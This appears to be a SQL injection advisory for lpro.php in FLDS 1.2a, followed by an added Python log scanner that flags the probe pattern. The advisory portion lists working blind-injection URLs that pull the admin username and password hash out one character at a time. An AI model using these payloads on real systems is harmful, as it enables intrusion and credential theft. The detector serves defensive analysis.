FLDS version 1.2a suffers from a blind SQL injection vulnerability in lpro.php.
#########################################################################################################################
[+] FLDS 1.2a lpro.php (id) Blind SQL Injection Vulnerability
[+] Discovered By SirGod
[+] Greetz : All my friends
#########################################################################################################################
[+] Blind SQL Injection
- Get username:
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),1,1))>96
Query is true (page loads normally). Move on to the next ASCII value.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),1,1))>97
Query is false, so the first char of the username is ascii(97), which is "a".
Then move to the next char of the username: change the substring offset 1,1 to 2,1 (the limit 0,1 stays the same).
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),2,1))>99
Query is true (page loads normally). Move on to the next ASCII value.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),2,1))>100
Query is false, so the second char of the username is ascii(100), which is "d".
And so on ... change the substring offset: 1,1 then 2,1 then 3,1 ... Username is: admin (Example)
- Get password (hash):
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),1,1))>49
Query is true (page loads normally). Move on to the next ASCII value.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),1,1))>50
Query is false, so the first char of the password hash is ascii(50), which is "2".
Then move to the next char of the password hash: change the substring offset 1,1 to 2,1 (the limit 0,1 stays the same).
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),2,1))>48
Query is true (page loads normally). Move on to the next ASCII value.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),2,1))>49
Query is false, so the second char of the password hash is ascii(49), which is "1".
And so on ... change the substring offset: 1,1 then 2,1 then 3,1 ... Password hash is: 21232f297a57a5a743894a0e4a801fc3 (Example)
#########################################################################################################################
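Added defensive example, not part of the advisory: a small Python scanner that parses combined-style web-server access-log lines, percent-decodes the query string, flags any parameter carrying the boolean-based probe shape shown above (`and ascii(substring((SELECT ...`), and counts probes per source and path, since extracting a value one character at a time leaves a long run of such requests from one client. The log lines are constructed sample data and the combined log format is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined-log style); the query strings mirror
# the probe shape in the advisory, percent-encoded as a client would send them.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "GET /flds/lpro.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:12:00:02 +0000] "GET /flds/lpro.php?id=1%20and%20ascii(substring((SELECT%20username%20from%20users%20limit%200,1),1,1))%3E96 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:12:00:03 +0000] "GET /flds/lpro.php?id=1%20and%20ascii(substring((SELECT%20username%20from%20users%20limit%200,1),1,1))%3E97 HTTP/1.1" 200 4871
198.51.100.4 - - [10/Oct/2023:12:00:04 +0000] "GET /flds/lpro.php?id=42 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+) (?P<size>\d+)')
# Boolean-based blind probe shape: "and ascii(substring((select ..." appended to a value;
# case-insensitive and whitespace-tolerant so spacing variations do not hide it.
BLIND_SQLI_RE = re.compile(r"\band\s+ascii\s*\(\s*substring\s*\(\s*\(\s*select\b", re.IGNORECASE)

def parse_line(line):
    """Return dict with ip, path and decoded query params, or None if not a log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # parse_qs percent-decodes values, so "%20" and "%3E" become " " and ">"
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "path": parts.path, "params": params}

def is_blind_sqli_probe(value):
    return BLIND_SQLI_RE.search(value) is not None

def scan_log(text):
    """Return (ip, path, param, decoded value) for every request carrying a probe."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            hits.extend((rec["ip"], rec["path"], name, v) for v in values if is_blind_sqli_probe(v))
    return hits

def probe_counts(hits):
    """Probes per (source ip, path): extraction needs many requests, so high counts stand out."""
    return Counter((ip, path) for ip, path, _, _ in hits)

if __name__ == "__main__":
    print(probe_counts(scan_log(SAMPLE_LOG)))
```

The same signature check applies to POST bodies or WAF logs once the parameter values are decoded; the per-source count is what separates a one-off scanner hit from an extraction in progress.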